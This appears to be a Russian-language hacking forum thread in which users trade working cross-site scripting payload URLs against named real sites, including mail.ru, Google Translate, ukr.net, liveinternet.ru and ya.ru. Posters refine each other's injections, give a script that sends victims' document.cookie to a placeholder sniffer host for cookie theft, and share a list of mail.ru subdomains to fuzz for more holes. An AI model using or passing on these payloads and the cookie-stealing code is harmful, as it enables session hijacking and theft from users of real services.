Mail.ru Code: http://apps.hi-tech.mail.ru/contest/add/?comment=&Domain=mail.ru&Login=&Password=&platform="><script>alert('xss')</script>
kravch_v, не надо юзать HTML, если XSS внутри JS-кода. http://apps.hi-tech.mail.ru/contest/add/?platform='%3Balert('xss')%3Ba='
M_script, спасибо! Google XSS Code: http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://ссылка_на_уязвимый_код Пример: Code: http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://exploit-db.ru/googlexss/ Для кражи кук используйте следующий код: Code: <script>img = new Image(); img.src = "http://адрес_сниффера.gif?"+document.cookie;</script> // M_script, то сообщение кто-то удалил. Печеньки я каким-то образом крал. Пассивки на ютубе нету.
kravch_v, ты в начале января уже выкладывал эту XSSку на гугле. Там выполнение JS-кода происходит не на google.ru(com), а на googleusercontent.com. Соответственно, куки будут с домена googleusercontent.com. Как их можно использовать на практике? upd: Куки на googleusercontent.com есть и украсть их можно, но в них не содержится сессии google.com
Mail.Ru - Недостаточная фильтрация в cookie Уязвимый код (cookie): Code: Mpop=test:test:[email protected]"><script>alert('xss')</script>; Заходим на w2.dwar.mail.ru и код успешно выполняется.
Почта Укр.нет HTML: http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+">+<": Поставлен оброботчик onMouseover Уязвимое место По сути можно поставить onerror и onload, нужно только подумать как .
Странная реализация. Зачем закрывать тег и писать <": ? onMouseover требует дополнительных действий пользователя. Угловые скобки не фильтруются. Можно использовать любые теги для выполнения кода. http://kino.ukr.net/search?query="><img+src=1+onerror="alert(document.cookie) Или выполнить код без действий пользователя, не закрывая тег. http://kino.ukr.net/search?query="+onfocus=alert(document.cookie)+autofocus="
Code: http://kino.ukr.net/persons/search?query="><img+src=1+onerror="alert('xss') Code: http://play.ukr.net/videos/upload Поля: Заголовок, Описание, Теги Уязвимый код: <script>alert('xss')</script> Также есть активная XSS на самой странице видео. Уязвимое место "теги"
LiveInternet.Ru POST Запрос Code: http://liveinternet.ru/importmail.php?cmd=getbook_icq&addicqs=111"><script>alert(/xss/)</script> Code: http://liveinternet.ru/flashes.php?id=58259&page=0&filter="><script>alert('xss')</script> Code: http://liveinternet.ru/flashes.php?id=629&page=1&userid=&cardinfo="><script>alert('xss')</script> Code: http://litube.li.ru/yandex/?search_string=111"><script>alert('xss')</script>
Ya.ru Уязвимый код: Code: <img src=1 onerror="alert('XSS')" /> 1) Заходим на clubs.ya.ru 2) Жмякаем на "Записать мысль" 3) Пишем в "HTML-Режиме" уязвимый код и переходим в режим "с оформлением" XSS Выполняется.
Но тем не менее. Еще видел одну маленькую дырочку, но раскрутить так и не смог. (Фильтруются <script>, </script> и еще несколько HTML-Тегов). <Img..., <hr>, <br> - выводятся.
Xss на mail.ru Работает не во всех платформах OC на Windows 7 не пашет. Code: http://search.enc.mail.ru/search_enc?q="><img src=k onerror=alert(0);>
Список 403 доменов на мейл.ру если у кого есть желание могут поФаззить на скрипты там дырявые есть 100%, парочку пасивок на прошлой неделе снял Code: http://aj.mail.ru http://bs.mail.ru http://dn.mail.ru http://ff.mail.ru http://fx.mail.ru http://js.mail.ru http://kp.mail.ru http://ok.mail.ru http://r1.mail.ru http://r2.mail.ru http://r3.mail.ru
Xss на Mail.ru 1. Заходим на страницу http://webagent.mail.ru/r/webagent/popup.html?branch=redesign-rc6. 2. Добавить Контакт 3. 4.Вставляем этот код в любое место 5.Нажимаем найти